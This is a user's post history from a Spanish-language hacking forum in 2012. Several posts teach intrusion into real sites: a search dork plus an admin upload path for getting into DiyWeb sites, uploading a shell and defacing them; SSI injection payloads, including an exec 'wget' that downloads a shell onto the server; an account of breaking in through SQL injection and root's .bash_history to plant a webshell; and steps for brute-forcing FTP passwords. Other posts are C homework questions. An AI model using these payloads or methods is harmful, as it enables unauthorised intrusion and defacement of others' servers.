Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#2
Dudas y pedidos generales / [SOLUCIONADO] Backtrack en tablet
Octubre 08, 2012, 10:51:31 PM
e pensado en comprarme este tablet Ramos W17 mi duda es si soportara backtrack la arm :S
#3
Bugs y Exploits / DiyWeb exploit
Agosto 28, 2012, 01:07:55 AM
Dork
"Power by DiyWeb"
inurl:/template.asp?menuid=
exploit : diyweb/menu/admin/image_manager.asp
ejemplo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y con un poco de ingenio bypass
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y acá subiríamos nuestra shell
como somos chicos buenos le dejaremos un mensaje al admin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
saludos
"Power by DiyWeb"
inurl:/template.asp?menuid=
exploit : diyweb/menu/admin/image_manager.asp
ejemplo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y con un poco de ingenio bypass
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y acá subiríamos nuestra shell
como somos chicos buenos le dejaremos un mensaje al admin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
saludos
#5
Dudas y pedidos generales / [SOLUCIONADO] Dns SPoof ayuda
Julio 19, 2012, 06:07:03 PMmm no me redirecciona y en etter me aparece esto cuando pongo la pagina de mocosoft
dns_spoof: [microsoft.com] spoofed to [198.182.196.56]
dns_spoof: [microsoft.com] spoofed to [198.182.196.56]
#6
Cursos, manuales y libros / (Server Side Include) SSI Inyección
Junio 22, 2012, 01:19:57 PM(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .
Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "->
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
este comando nos permite ver los directorios
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
con este comando nos permitirá enviar nuestra shell o exploit deface etc.
<!--#exec cmd="wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" -->
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta WEB PARA QUE PRACTIQUEN =D
#8
Hacking / Intrusión por bash_History
Junio 18, 2012, 11:01:04 PM
bueno soy xc0d3 en mis tiempo libre me dedico a realizar intrusiones xD bueno hace algunas semanas mi amigo y colega de aventuras crackx me comento por facebook acerca de esta intrusión que realizo con [Q]3rV[0] .
quiero compartir el vídeo que grabo [Q]3rV[0] .
En este video pretendo mostrar como a travez de una SQLI se accede a ficheros internos en el servidor, en la intrusion Crackx y yo, nos topamos con el.bash_history del usuario root, parece ser q el administardor agrega usuarios y cambia el password de una manera poco segura diria yo...XD!, gracias a esta falencia logramos acceder al ftp del vps y subir una webshell.
Créditos [Q]3rV[0] & Crackx
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
quiero compartir el vídeo que grabo [Q]3rV[0] .
En este video pretendo mostrar como a travez de una SQLI se accede a ficheros internos en el servidor, en la intrusion Crackx y yo, nos topamos con el.bash_history del usuario root, parece ser q el administardor agrega usuarios y cambia el password de una manera poco segura diria yo...XD!, gracias a esta falencia logramos acceder al ftp del vps y subir una webshell.
Créditos [Q]3rV[0] & Crackx
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Dudas y pedidos generales / [SOLUCIONADO] Duda con codigo en c :S
Junio 18, 2012, 10:22:05 PMbueno agradecer a la comunidad por ayudarme y orientarme
Como agrego una condicion para que el programa que cree no se pase a -100 etc .?¿ osea no siga restando sino que al kedar con menos dinero compre uno de los 4 y si tiene menos de 1499 le diaga adios
#10
Dudas y pedidos generales / [SOLUCIONADO] Ayuda en c :D a pseudo
Junio 13, 2012, 12:59:09 PM
programa en c que permita: Crear un arreglo de 100 números enteros que representan las edades de una persona. Estas deben estar entre 20 – 50 años. Mostrar las edades de manera tabulada en 10 filas de 10 edades. Mostrar el mensaje "El promedio de las edades es: XXX", donde XXX corresponde al cálculo correspondiente.
#11
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con codigo en c
Junio 11, 2012, 11:30:35 PM
Elaborar un programa que acepte por teclado números hasta que exista la condición de término -99. Cada vez que se ingrese un número este debe indicar si es menor o mayor que el ingresado anteriormente.
#12
Cursos, manuales y libros / Brutus
Junio 01, 2012, 11:28:36 AM
Contraseñas de FTP usando Ataque de Fuerza Bruta
FTP es una aplicación o servicio o protocolo que se puede utilizar para transferir archivos de un lugar a otro, lo que realmente es muy práctico durante la transferencia de archivos desde una máquina local a un mando a distancia.
vamos a discutir cómo podemos romper la contraseña de IIS instalado en el servicio FTP de Windows .
¿Qué es la fuerza bruta?
Fuerza Bruta es un tipo de ataque en el que cada posible combinación de las letras son juzgados, números y caracteres especiales hasta que la contraseña correcta se corresponde con el nombre de usuario. La principal limitación de este ataque es el factor tiempo. El tiempo que toma para encontrar la combinación adecuada depende principalmente de la longitud y la complejidad de la password.
1. La herramienta que se emplea "Brutus" Descargar : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )
2. Necesitamos saber el destino del "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"
Procedimiento:
Paso 1 . Aquí e mostrado una página de autenticación de un servicio de FTP.
2. abrir "Brutus" y seleccionar la lista de palabras y seleccionar "FTP" en el menú desplegable y haga clic en Inicio.
Paso 3 . El tiempo que se toma como he mencionado anteriormente depende de la complejidad y la duración de la password.
FTP es una aplicación o servicio o protocolo que se puede utilizar para transferir archivos de un lugar a otro, lo que realmente es muy práctico durante la transferencia de archivos desde una máquina local a un mando a distancia.
vamos a discutir cómo podemos romper la contraseña de IIS instalado en el servicio FTP de Windows .
¿Qué es la fuerza bruta?
Fuerza Bruta es un tipo de ataque en el que cada posible combinación de las letras son juzgados, números y caracteres especiales hasta que la contraseña correcta se corresponde con el nombre de usuario. La principal limitación de este ataque es el factor tiempo. El tiempo que toma para encontrar la combinación adecuada depende principalmente de la longitud y la complejidad de la password.
1. La herramienta que se emplea "Brutus" Descargar : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )
2. Necesitamos saber el destino del "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"
Procedimiento:
Paso 1 . Aquí e mostrado una página de autenticación de un servicio de FTP.
2. abrir "Brutus" y seleccionar la lista de palabras y seleccionar "FTP" en el menú desplegable y haga clic en Inicio.
Paso 3 . El tiempo que se toma como he mencionado anteriormente depende de la complejidad y la duración de la password.
#13
Cursos, manuales y libros / C|EH
Junio 01, 2012, 11:25:43 AM
Material CEH es muy difícil de encontrar y no esta en cualquier foro lo comparto con uds atte xc0d3
1: Student Introduction
2: Introduction to Ethical Hacking
3: Hacking Laws
4: Footprinting
5: Google Hacking
6: Scanning
7: Enumeration
8: System Hacking
9: Trojans and Backdoors
10: Viruses and Worms
11: Sniffers
12: Social Engineering
13: Phishing
14: Hacking Email Accounts
15: Denial of Service
16: Session Hijacking
17: Hacking Webservers
18: Web Application Vulnerabilities
19: Web based Password Cracking Techniques
20: SQL Injection
21: Hacking Wireless Networks
22: Physical Security
23: Linux Hacking
24: Evading IDS Firewall and Honeypot
25: Buffer Overflows
26: Cryptography
27: Penetration Testing
28: Writing Virus Codes
29: Assembly Language Tutorial
30: Exploit Writing 1
31: Exploit Writing 2
32: Exploit Writing 3
33: Reverse Engineering Techniques
34: MAC OS X Hacking
35: Hacking Routers, Cable Modems and Firewalls
36: Hacking Mobile Phones, PDA and Handheld Devices
37: Bluetooth Hacking
38: VoIP Hacking
39: RFID Hacking
40: Spamming
41: Hacking USB Devices
42: Hacking Database Servers
43: Cyber Warfare- Hacking Al-Qaida and Terrorism
44: Internet Content Filtering Techniques
45: Privacy on the Internet
46: Securing Laptop Computers
47: Spying Technologies
48: Corporate Espionage by Insiders
49: Creating Security Policies
50: Software Piracy and W
51: Hacking and Cheating Online Games
52: Hacking RSS and Atom
53: Hacking Web Browsers
54: Proxy Server Technologies
55: Preventing Data Loss
56: Hacking Global Positioning System
57: Computer Forensics and Incident Handling
58: Credit Card Frauds
59: How to Steal Passwords
60: Firewall Technologies
61: Threats and Countermeasures
62: Case Studies
63: Botnets
64: Economic Espionage
65: Patch Management
67: Security Convergence
68: Identifying the Terrorists
69: prova 312-50
70: CEH – Classroom Lab Setup v6
links:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
1: Student Introduction
2: Introduction to Ethical Hacking
3: Hacking Laws
4: Footprinting
5: Google Hacking
6: Scanning
7: Enumeration
8: System Hacking
9: Trojans and Backdoors
10: Viruses and Worms
11: Sniffers
12: Social Engineering
13: Phishing
14: Hacking Email Accounts
15: Denial of Service
16: Session Hijacking
17: Hacking Webservers
18: Web Application Vulnerabilities
19: Web based Password Cracking Techniques
20: SQL Injection
21: Hacking Wireless Networks
22: Physical Security
23: Linux Hacking
24: Evading IDS Firewall and Honeypot
25: Buffer Overflows
26: Cryptography
27: Penetration Testing
28: Writing Virus Codes
29: Assembly Language Tutorial
30: Exploit Writing 1
31: Exploit Writing 2
32: Exploit Writing 3
33: Reverse Engineering Techniques
34: MAC OS X Hacking
35: Hacking Routers, Cable Modems and Firewalls
36: Hacking Mobile Phones, PDA and Handheld Devices
37: Bluetooth Hacking
38: VoIP Hacking
39: RFID Hacking
40: Spamming
41: Hacking USB Devices
42: Hacking Database Servers
43: Cyber Warfare- Hacking Al-Qaida and Terrorism
44: Internet Content Filtering Techniques
45: Privacy on the Internet
46: Securing Laptop Computers
47: Spying Technologies
48: Corporate Espionage by Insiders
49: Creating Security Policies
50: Software Piracy and W
51: Hacking and Cheating Online Games
52: Hacking RSS and Atom
53: Hacking Web Browsers
54: Proxy Server Technologies
55: Preventing Data Loss
56: Hacking Global Positioning System
57: Computer Forensics and Incident Handling
58: Credit Card Frauds
59: How to Steal Passwords
60: Firewall Technologies
61: Threats and Countermeasures
62: Case Studies
63: Botnets
64: Economic Espionage
65: Patch Management
67: Security Convergence
68: Identifying the Terrorists
69: prova 312-50
70: CEH – Classroom Lab Setup v6
links:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#14
Bugs y Exploits / XSSer: automatic tool for pentesting XSS attacks
Junio 01, 2012, 11:20:48 AMXSSer es una herramienta de prueba que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.
XSS Es un tipo de inseguridad informática típico de las aplicaciones Web,
que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario.
Instalacion
apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip en bt ya esta instalada
EJEMPLO
xss descubierto por mi amigo Crackx
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
mas Info ->No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Páginas1